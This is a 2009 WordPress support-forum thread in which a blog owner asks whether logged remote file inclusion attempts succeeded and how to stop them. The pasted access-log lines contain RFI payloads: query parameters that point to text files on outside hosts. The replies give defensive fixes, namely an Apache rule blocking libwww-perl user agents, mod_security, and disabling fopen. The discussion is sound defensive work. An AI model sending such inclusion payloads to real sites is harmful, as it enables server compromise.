Remote File Inclusion (RFI) Attempts

asechrest
(@asechrest)

14 years, 11 months ago

Hi, all. I’ve had a bunch of remote file inclusion attempts today – they’ve been hammering away at my domain. I’ve done my best to research the subject but I’m starting from scratch – I knew nothing about it until this evening.

I’m poring through my server logs and trying to see if the attacks have been successful. Mostly I see 404’s, which I’ve been told probably means that specific attempt was not successful. But in some cases I see like the following, with a 200 success indication:

97.106.184.215 – – [29/Apr/2009:20:24:56 -0500] “GET /wp-content/plugins/gd-star-rating/css/gdstarating.css.php?s=astarscape%7C20%7C3%7Cpng%7C1%23moxygen%7C20%7C20%7Cpng%7C1 HTTP/1.1” 200 7955 “http://blogingenuity.com/2009/04/08/how-to-validating-your…site-the-easy-way-part-2/%20%20/errors.php?error=http://www.sanbokyodan.fr/editor/xml/copyright.txt??” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 GTB5”

I don’t know if this means the attempt was successful and I need to start worrying or what.

Could anyone who’s experienced this shed some light on:
1) How can I tell if an attempt was successful and what’s the next step?
2) How can I best prevent the attacks in the first place

Thanks in advance.

Viewing 5 replies - 1 through 5 (of 5 total)

whooami
(@whooami)

14 years, 11 months ago

what do you see when you put that into a browser?

Thread Starter asechrest
(@asechrest)

14 years, 11 months ago

I get a page not found notice, which I think is good news. But I have hundreds of these today, from what look like a number of different sources. Some of them appear to be trying to load a text file. I have a bunch similar to this:

209.62.42.242 – – [29/Apr/2009:15:36:49 -0500] “GET /2009/04/08//vwar/backup/errors.php?error=http://caketaker.biz//scrollerroller/id.txt??? HTTP/1.1” 404 40489 “-” “Mozilla/5.0”

I’ve searched my server filesystem for the text file name and it hasn’t been found. This is also, I think, good news.

Generally, though, I’m wondering if I can simply determine if they successfully added a page or successfully loaded a file to my server, and if the answer is no to both, can I feel relatively comfortable (not assured, obviously) that the attempts failed?

I’m researching how to prevent the attempts altogether. I’ve checked my file/folder permissions and they seem to be what’s recommended. I’ve read some suggestions not to use “fopen” but understanding that is a bit above me at the moment.

Thanks for the response.
whooami
(@whooami)

14 years, 11 months ago
they failed.

what theyre trying to load is right here,

http://www.//sanbokyodan.//fr/editor/xml/copyright.txt

link broke.

one of the easiest ways to thwart a lot (not all, just a lot) of rfi attempts is to disallow any libwww-perl user-agents.
```
RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC]
RewriteRule ^.*$ - [F]
```
Thats one way.

Some will argue with me, but mod_security is also excellent at stopping them.

Of course the best way is yes, to not use fopen. You can disable it in the php.ini.
Thread Starter asechrest
(@asechrest)

14 years, 11 months ago

Ok, I’ll take a look at implementing those and do some more research to see if not using fopen has any negatives.

Thanks whooami.

Thread Starter asechrest
(@asechrest)

14 years, 11 months ago

For anyone new to RFI who comes across this thread in the future…

After Whooami’s help and additional research, I wrote up a little beginners guide to tracking and mitigating Remote File Inclusion.

Constructive criticism or corrections from those more knowledgeable than me is welcomed.

Viewing 5 replies - 1 through 5 (of 5 total)

The topic ‘Remote File Inclusion (RFI) Attempts’ is closed to new replies.

Remote File Inclusion (RFI) Attempts

Tags

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics